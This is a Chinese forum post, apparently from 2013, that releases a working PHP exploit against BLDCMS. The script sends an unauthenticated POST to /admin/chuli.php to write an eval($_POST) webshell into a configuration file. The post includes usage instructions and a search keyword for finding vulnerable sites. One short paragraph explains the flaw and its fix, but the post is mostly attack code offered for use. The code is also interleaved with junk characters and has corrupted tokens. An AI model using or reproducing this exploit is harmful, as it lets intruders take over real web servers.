之前想搞一个黑阔站,发现旁站有一个站用了BLDCMS,我就下载看了……找到了一个getshell漏洞。

话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了,擦,居然被人先发了。

既然都有人发了,我就把我之前写好的EXP放出来吧。

从EXP本身看,问题大概出在 /admin/chuli.php?action=a_1:请求里没有带任何登录凭据,POST 过来的 sqlite 参数似乎未经转义就被写进了 conn/config/normal2.php(所以才要求 GPC=Off)。排查时可以检查该文件里是否出现 eval($_POST[...]) 一类内容,修复则应给该接口加上登录校验,并对写入配置文件的值做转义。
02.<!--?php1 P7 T' Q1 n, M! t8 }
03.echo "-------------------------------------------------------------------
( ~; z9 @5 G' q* n' Y04. I* C$ k) B4 `& K5 A2 ^9 s
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
; S; i/ e/ G* U, _' d/ E$ L06. + E( S. n: V' a7 f. H
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
, r& D; I' {% {5 c: n08. 5 [& g) v/ R- ?- k
09.QQ:981009941\r\n 2013.3.21\r\n ' a' q' {+ ^1 Y6 b7 W
10.
5 c0 H B$ k- D( C% Z) T, O11. ' k2 u' ]+ J7 e2 S6 a
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码 z z5 ~/ ^& g
13.
* l4 Z6 s5 m1 C: }6 Y3 Y7 d14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
- a% f! X4 h8 g2 K" S6 X- P15. ) _* m, C0 Y8 b# i( S
16.--------------------------------------------------------------------\r\n";" L9 b$ X3 g5 b
17.$url=$argv[1];
3 p+ U& |! C4 [8 X0 Q+ x5 |18.$dir=$argv[2];8 G0 N; S P/ ^- f9 ]' g
19.$pass=$argv[3];
, e; m- Z7 I1 A2 f4 C: s1 X' h20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
* Y4 g6 e! e9 q8 I21.if (emptyempty($pass)||emptyempty($url))
$ v7 }# o: O8 D0 p* v3 E5 G22.{exit("请输入参数");}
8 _6 e$ V1 |/ ` B6 b23.else3 Y. X& V4 m: T, j# U
24.{7 d, Z' l3 r& @ O' Z8 ^
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
6 g8 q' p2 C( D" Q26.
# ]9 K1 Z/ n+ k7 s! s27.al;
3 V& r" F5 p/ T! [28.$length = strlen($fuckdata);0 ]! }" Y8 t4 c& z4 e$ ?
29.function getshell($url,$pass)
. Z1 j. o" c8 r7 Q7 j) s30.{
: ~+ C5 c4 p9 f5 [: F" l31.global $url,$dir,$pass,$eval,$length,$fuckdata;2 P' u E# ~" E% S
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
3 `& ?) Y/ D. {8 a L: J33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
, x ?/ U( O( s& H" }4 l7 R34.$header .= "User-Agent: MSIE\r\n";. Z: ]+ M( ?& Z* ^# B
35.$header .= "Host:".$url."\r\n";
" s5 A, }1 n0 c8 s9 d36.$header .= "Content-Length: ".$length."\r\n";
. F+ K% y* y [7 z37.$header .= "Connection: Close\r\n";6 d. ?# t @: Q; ]' W
38.$header .="\r\n";, Z5 A- c) o3 r! n" n7 @5 ?* S. ^6 s/ O
39.$header .= $fuckdata."\r\n\r\n";* U( B' D) c) y* H1 K R
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
' j) F/ Q# I1 P! `$ O41.if (!$fp)
( T+ m' K- W2 P2 }% _" E42.{
. V: A( V2 z9 f, |43.exit ("利用失败:请检查指定目标是否能正常打开");2 G! V8 e) O3 U/ A. F5 g
44.} w/ @' h! F+ d! C
45.else{ if (!fputs($fp,$header))' w8 p) ?* f" j8 J5 t4 V, U4 @$ P) R
46.{exit ("利用失败");}4 A: c% B; i$ E% [! }
47.else! H! S' I$ s5 s: T1 U* O+ W4 Q8 W
48.{$ V+ z$ m9 p+ L: b+ _. f
49.$receive = '';
1 u1 @7 {, I5 i: V7 k* s! q50.while (!feof($fp)) {0 @8 O. l- ^* Q
51.$receive .= @fgets($fp, 1000);9 e' [9 g# r3 E C0 }, }# O
52.}
6 t( o6 l- N+ v53.@fclose($fp);. G" O H( \& [. { B, w1 u% \
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标$ P( Q/ m1 @; E* O+ i5 R
55.
+ ]/ H. O/ K; }1 e# g+ W# }: H56.GPC是否=off)";
) C% a- {- \ e4 `" v. [4 I# I57.}}
+ b6 B! O7 ]3 }' a w, v$ E8 x58.}6 g: ?& n2 D8 m F1 B, v
59.}
! |% O$ V" _( ^60.getshell($url,$pass);
7 v& H3 ~8 Z8 S# p: |61.?-->
by 数据流